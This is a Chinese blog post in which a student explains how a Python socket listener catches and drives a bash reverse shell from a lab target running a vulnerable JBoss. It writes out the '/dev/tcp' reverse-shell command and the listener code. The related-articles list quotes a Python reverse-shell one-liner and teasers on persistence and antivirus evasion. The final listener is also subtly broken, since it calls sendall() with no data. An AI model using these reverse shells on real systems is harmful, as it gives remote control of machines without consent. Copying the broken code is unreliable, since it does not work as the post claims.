Python获取bash反弹shell,并与bash交互

最新推荐文章于 2025-05-20 11:30:56 发布
最新推荐文章于 2025-05-20 11:30:56 发布
阅读量553 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: python bash 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Locosomnus/article/details/133976014
毕设中Python获取反弹shell难题与Wireshark分析,通过字符串指令转换和16进制添加换行符解决。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

毕设做的是漏洞扫描与利用工具,工具是用python写的,可以向目标组件发送构建好的payload。但是,这时候遇到一个难题,即python如何获取目标主机的反弹shell,并与这个反弹shell的连接进行交互。当然,我们可以利用NC等工具来获取,这样更方便,但是毕设里如果要靠NC去完成这件事,那未免也太low了一点。我在网上查了很多的资料,但大多没有这方面的描述,有也是利用subprocess开一个新进程去调用NC(这和直接用有什么区别),或者用第三方库去获取(也没有准确描述是哪个库和怎么使用)

python获取bash的反弹shell

环境搭建

环境:
	攻击主机(搭载python):192.168.0.160
	目标主机(搭载Linux和一个有漏洞的JBoss组件):192.168.0.190

目标主机运行代码

bash -i >& /dev/tcp/192.168.0.160/65533 0>&1

python代码

错误示例

其实和正确的代码差别不是很大,但运行以下代码,会发现python虽然可以获取到来自目标主机的反弹shell连接,但是发送到目标主机上的shell指令并不会被执行

import socket

# 用于监听的主机和端口
HOST = '192.168.0.160'
PORT = 65533

def start_listener():
	 # 创建一个TCP socket
	 listener_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	 # 绑定地址和端口
	 listener_socket.bind((HOST, PORT))
	 # 监听连接
	 listener_socket.listen(1)
	 print(f"Listening for connections on {HOST}:{PORT}")
	 # 接受连接并处理
	 client_socket,client_address = listener_socket.accept()
	 print(f"Received connection from {client_address[0]}:	{client_address[1]}")
 	 # 与客户端进行交互
	 while True:
  		 command = input("Enter command: ")
  		 # 发送命令给目标主机
  		 client_socket.sendall(command.encode())
  		 # 接收响应
  		 response = client_socket.recv(4096).decode()
 	 	 print(response)
	 # 关闭连接
	 client_socket.close()
	 listener_socket.close()

# 启动监听程序
start_listener()

分析过程

利用wireshark分别对NC和Python获取的连接进行分析

// 这是NC每次发送给目标主机的数据包
0000   00 0c 29 06 82 2c b0 25 aa 58 36 a9 08 00 45 00   ..)..,.%.X6...E.
0010   00 3b 33 3d 40 00 80 06 00 00 c0 a8 00 a0 c0 a8   .;3=@...........
0020   00 be ff fe a2 fe 4c 04 b7 28 bf 06 f6 4b 80 18   ......L..(...K..
0030   20 03 82 dc 00 00 01 01 08 0a 2f 68 7e 95 00 0b    ........./h~...
0040   b7 cb 77 68 6f 61 6d 69 0a                        ..whoami.

// 这是上述Python代码每次发送给目标主机的数据包
0000   00 0c 29 06 82 2c b0 25 aa 58 36 a9 08 00 45 00   ..)..,.%.X6...E.
0010   00 3a 33 86 40 00 80 06 00 00 c0 a8 00 a0 c0 a8   .:3.@...........
0020   00 be ff fd 9a 50 92 8a 0f d4 29 28 0f 2e 80 18   .....P....)(....
0030   20 03 82 db 00 00 01 01 08 0a 2f 6c 5f 72 00 0f    ........./l_r..
0040   d2 4f 77 68 6f 61 6d 69                           .Owhoami

抛去以太网层,IP层数据,可以看到DATA并没有特别大的区别,唯一的区别就是NC的末尾有0a而Python的末尾没有,0a在ASCII中是换行符的意思。这也就是为什么上述python代码发送的指令,目标主机并没有执行的原因(目标主机一直在等待一个换行符,来确定要执行的指令(我猜的))

解决方法

将字符串指令转换为16进制,并在末尾拼接上一个0a即可

字符串指令构建方法:

def command_generate(command):
    hex_data=''
    for i in command:
        hex=bytes(i,'utf-8').hex()
        hex_data=hex_data+hex+' '	#逐个将字符转为16进制

    hex_data=hex_data+'0a'	#给末尾拼接上0a
    bin_data=bytes.fromhex(hex_data)	#转化为2进制流
    return bin_data

发送函数:

import socket

# 用于监听的主机和端口
HOST = '192.168.0.160'
PORT = 65533

def start_listener():
	 # 创建一个TCP socket
	 listener_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	 # 绑定地址和端口
	 listener_socket.bind((HOST, PORT))
	 # 监听连接
	 listener_socket.listen(1)
	 print(f"Listening for connections on {HOST}:{PORT}")
	 # 接受连接并处理
	 client_socket,client_address = listener_socket.accept()
	 print(f"Received connection from {client_address[0]}:	{client_address[1]}")
 	 # 与客户端进行交互
	 while True:
  		 command = input("Enter command: ")
  		 # 发送命令给目标主机
  		 
  		 command=command_generate(command) #用我们的方法重新构建指令
  		 
  		 client_socket.sendall()
  		 # 接收响应
  		 response = client_socket.recv(4096).decode()
 	 	 print(response)
	 # 关闭连接
	 client_socket.close()
	 listener_socket.close()

# 启动监听程序
start_listener()

结尾

在做毕设时遇到的问题,和自己解决这个问题的过程,我很菜,希望各位大佬们可以提出批评,我一定好好学习

1vresse°
关注
python实战之反弹shell远程控制
LKmnbZ's Blog
01-12 1010
shell就是一个命令执行环境,在windows系统下可以认为shell就是cmd webshell就是通过浏览器输入命令,在远程电脑上执行 反弹shell就是控制者作为服务器使用,被控制者作为客户端使用 python执行系统命令,os subprocee os.popen(command+”2>&1”).read() 2>&1可以把出错信息解读出来 ...
python 捕获 shell/bash 脚本的输出结果实例
09-15
`subprocess`模块提供了更高级别的接口,可以方便地外部程序交互,而不仅仅是执行命令获取输出。 以下是一个简单的Python代码示例,展示了如何捕获`date`命令(一个常见的shell命令,用于打印当前日期和时间)...
python邮件反弹shell
09-29
使用python反弹shell,根据邮件确定反弹地址
python 反弹shell 交互
qq_32851223的博客
11-14 1287
本篇介绍解决如下问题的python脚本:漏洞利用,监听攻击机的端口拿到反弹shell,利用反弹shell进行横向的信息探索。
在合法靶场中用 Python 打造可升级的反弹 Shell
最新发布
hello.reader
05-20 1064
本文介绍了反弹 Shell 的概念、工作原理及实现方法。反弹 Shell 是一种被控端主动连接攻击者的技术,能够绕过防火墙限制。文章详细讲解了如何使用 Python 编写最小可用的反弹 Shell 代码,提供了代码剖析。此外,还介绍了升级玩法,如使用 TLS 加密通道、跨平台兼容性处理以及自动重连持久化技术。从防御角度,文章列出了蓝队可以采取的检测防御措施,包括网络层面的 IDPS 规则、主机层面的基线加固、日志监控以及 IOC 检测。最后,文章强调了在渗透测试中必须遵循合规流程,获取书面授权,严禁
各种shell反弹方法
weixin_46626737的博客
05-16 3137
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
python反弹shell
weixin_42576467的博客
01-07 787
你是想问 Python 如何实现反弹 shell 吗? 反弹 shell 是一种通过远程连接获取受害者计算机的 shell 权限的攻击技术。 使用 Python 反弹 shell 的方法如下: 首先,在本地计算机上运行一个监听程序,等待连接。 然后,在受害者计算机上运行一个 Python 脚本,该脚本将连接到本地计算机的监听程序。 当连接建立后,就可以通过本地计算机上的 shell 命令控制...
基于ShellBash脚本的SSR多用户控制Python集成设计源码
10-11
该项目的源码设计巧妙地将ShellBash脚本的简洁性Python语言的强大功能结合起来,提供了一个能够对服务器进行压力测试和管理的系统。系统不仅仅局限于脚本语言的应用,还扩展到了多种编程语言,体现了其设计上的...
Python-何用Python代替Bash脚本指南
08-10
Bash脚本在遇到错误时往往直接退出,而Python提供了异常处理机制,可以在出现错误时优雅地捕获处理,增强了脚本的健壮性。 4. **丰富的库支持** Python拥有大量的第三方库,如`os`、`sys`、`subprocess`用于...
Python3交互shell ipython3安装及使用详解
09-16
### Python3交互Shell IPython3安装及使用详解 #### 一、IPython简介 IPython(Interactive Python)是一款功能强大的交互Python Shell,相比于Python自带的标准Shell,它提供了更多的便利性和灵活性。其中,...
使用python反弹shell
noner_n的博客
05-05 3126
python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" 使用python进行反弹shell,IP改成攻击机ip,端口随意,没有
Python 渗透测试:反弹 shell反弹 后门 || 程序免杀)
网络安全领域___专研者.
05-15 3040
反弹 shell (Reverse Shell) 是一种常见的渗透测试技术,它指的是受害者主机主动连接攻击者的主机,从而让攻击者获得对受害者主机的控制权。在一个典型的反弹 shell 攻击中,攻击者会在自己的主机上监听一个特定的端口,然后诱使目标主机主动连接到这个端口。当目标主机攻击者的主机建立连接后,攻击者就可以通过这个连接获得目标主机的 shell 访问权限,从而进行进一步的渗透和控制。
Python3 实现一个简单的反弹shell工具
坚持硬核
01-15 695
Server.py from socket import * from time import ctime from threading import Thread from subprocess import Popen,PIPE HOST = "" PROT = 23335 BUFSIZE = 1024 ADDR = (HOST, PROT) def send(worker_socket,data): worker_socket.send(data) def worker(worke
python反弹shell(linux)
秋水的博客
10-02 3230
第一种代码如下 标准输入 (stdin) :代码为 0 ,使用 < 或 << 标准输出 (stdout):代码为 1 ,使用 > 或 >> 标准错误输出(stderr):代码为 2 ,使用 2> 或 2>> import socket,subprocess,os s=socket.socket(socket.AF_...
使用 Python 实现反弹 shell
suanfa_student的博客
02-16 475
通过这种方式,你可以获得远程系统的 shell 控制。注意:请在合法且授权的场景中使用这些命令。在你的机器上,可以使用。
Python黑客编程——反弹shell
JOHNSON 抓什 的博客
05-20 1032
看了上两边文章,你会了使用socket进行交互和subprocess执行系统命令,那么两者结合起来可以制作一个反弹shell,没有看过的去看一下把。 先说一下思路 首先hacker攻击方,编写脚本控制端(server)和受控端(client), 控制端(server)开启监听等待受害者(client)连接,连接成功后,就可以获得shell了 受控端(client)上有运行命令的函数,将接收到的数据作为命令运行,再将运行结果发送回控制端(server) 最后就是考验社会工程学的时候到了,打开监听诱使
python shell反弹shell
WY92139010的博客
03-04 342
python shell反弹shell 正常shell需要先在攻击端开机情况下开启程序,然后攻击端运行程序,才能连接 反弹shell,攻击端是服务端,被攻击端是客户端正常shell,攻击端是客户端,被攻击端是服务端 反弹shell,先启用服务端,再启用客户端 反弹shell的好处就是:一旦被攻击端开机,立即连接上攻击端(需要攻击端一直运行) shell: 客户端:  ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值